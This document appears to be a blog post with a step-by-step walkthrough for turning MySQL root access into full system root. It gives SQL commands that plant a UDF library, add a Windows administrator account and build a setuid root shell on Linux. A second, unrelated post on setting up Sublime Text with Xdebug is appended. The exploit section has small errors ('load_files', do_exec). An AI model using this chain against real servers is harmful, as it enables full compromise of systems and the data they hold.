MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux

Once a MySQL database server has been compromised at root level, it’s often possible to escalate this access to full system level access using User Defined Functions (UDFs). We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.
Firstly, you’ll want to check out a copy of sqlmap. For this attack you’ll want to browse to the ‘udf’ directory and select the appropriate library depending on your target platform:

1. udf/mysql/linux/32/lib_mysqludf_sys.so
2. udf/mysql/linux/64/lib_mysqludf_sys.so
3. udf/mysql/windows/32/lib_mysqludf_sys.dll
4. udf/mysql/windows/64/lib_mysqludf_sys.dll

The steps for escalation on both Windows and Linux are the same. Firstly, we need to get a copy of the correct library on to the target machine in a known location – this could be by uploading to a user account we have access to, or uploading via a website image/file upload, or anonymous FTP account. The second step is issuing a SQL query to load this file in to a newly created table row.
Third, we then want to dump that table row out to a new file in either the ‘/usr/lib’ directory or the ‘c:\windows\system32′ directory depending on whether we are on Linux or Windows respectively. The reason we need to do this, is that our regular web application or user account does not have permission to create files in these directories, however the MySQL root user does. Next, we want to instruct MySQL to create a new function to point to the code in our malicious library. Lastly, we execute this new function with arbitrary system commands that we wish to run.

MySQL on Windows Escalation
On windows, the process is as follows:

USE mysql;

CREATE TABLE npn(line blob);

INSERT INTO npn values(load_files('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));

SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';

CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';

SELECT sys_exec("net user npn npn12345678 /add");

SELECT sys_exec("net localgroup Administrators npn /add");



MySQL on Linux Escalation
On Linux, the process is really much the same, assuming we’re logged in as user ‘npn':

* mysql> use mysql;

* mysql> create table npn(line blob);

* mysql> insert into npn values(load_file('/home/npn/lib_mysqludf_sys.so'));

* mysql> select * from npn into dumpfile '/usr/lib/lib_mysqludf_sys.so';

* mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

* mysql> select do_exec('id > /tmp/out; chown npn.npn /tmp/out');

Now from our shell, we can cat /tmp/out:

* npn@pwn:~$ cat /tmp/out

* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

We can confirm that the commands we ran were executed as root. The easiest thing to do now is for user ‘npn’ to create and compile a simple setuid/system program under C:

#include

#include

#include

int main(void)

{

    setuid(0); setgid(0); system(“/bin/bash”);

}

We can compile this and place it in /tmp/ with:

gcc -o /tmp/shell /home/npn/shell.c

Finally, we can use our MySQL root account to set the setuid bit on the binary:

* mysql> select do_exec('chmod +s /tmp/shell');

User ‘npn’ can then execute /tmp/shell to gain a root shell

npn@pwn:~$ /tmp/shell

root@pwn:/home/npn# cd ~/

root@pwn:~# id

uid=0(root) gid=0(root) groups=0(root)

root@pwn:~# ps

  PID TTY          TIME CMD

 1919 pts/1    00:00:00 bash

 2058 pts/1    00:00:00 ps

root@pwn:~#

Setup PHP Debugger with Sublime in Kali(Debian)

1. Install Sublime
# wget "http://c758482.r82.cf2.rackcdn.com/sublime-text_build-3065_amd64.deb"
# dpkg -i sublime-text_build-3065_amd64.deb

2. Run sublime
# cd /opt/sublime_text
# ./sublime_text

3. Install package control plugin. Open View -> Show Console
If you use Sublime2
"import urllib2,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else None; urllib2.install_opener( urllib2.build_opener( urllib2.ProxyHandler()) ); by = urllib2.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); open( os.path.join( ipp, pf), 'wb' ).write(by) if dh == h else None; print('Error validating download (got %s instead of %s), please try manual install' % (dh, h) if dh != h else 'Please restart Sublime Text to finish installation')"

If you use Sublime3(in this post, we use this version)
Place this code and enter
"import urllib.request,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by) "

4. Restart Sublime

5. Go to Preference -> Package Control to Install Package(Plugin)

6. Type xdebug and install it

7. Install LAMP(Linux + Apache2 + MySQL + PHP) and requirement software
#  apt-get install apache2 php5 php5-gd mysql-server php5-mysql php5-dev php-pear make python

8. Install Xdebug module for PHP5
# apt-get install php5-xdebug

Configure xdebug module in /etc/php5/conf.d/20-xdebug.ini, and fill with this options
zend_extension=/usr/lib/php5/20100525/xdebug.so
xdebug.remote_enable=on
xdebug.remote_handler=dbgp
xdebug.remote_host=localhost
xdebug.remote_port=9000 

9. Restart Apache2
# /etc/init.d/apache2 restart

9. Create example loop php file in sublime
    $arr = array(1, 2, 3, 4);

    foreach ($arr as &$value)
    {
            $value = $value * 2;
            print $value;
    }
?>
 
10. In Sublime, create some  break point with right click and Xdebug -> Add/Remove Break Point.

11. In Sublime menu, Go to "Tools -> Xdebug -> Start Debugging"
(You can see the config of Sublime from "Tools -> Xdebug -> Settings Default(Or Settings User)")

12. Open Firefox

13. Install "The easiest Xdebug 2.0" addon

14. Restart Firefox

15.  Go to "Tools -> Addon", Open Preference of The easiest Xdebug 2.0

16. Input "sublime.xdebug" into IDE key for remote debugging.

17. Visit the page that we want to debug(same page of step#9). Click the bug in the right side

18. Try to refresh it in web browser, the debug was begin and in sublime will control the output page.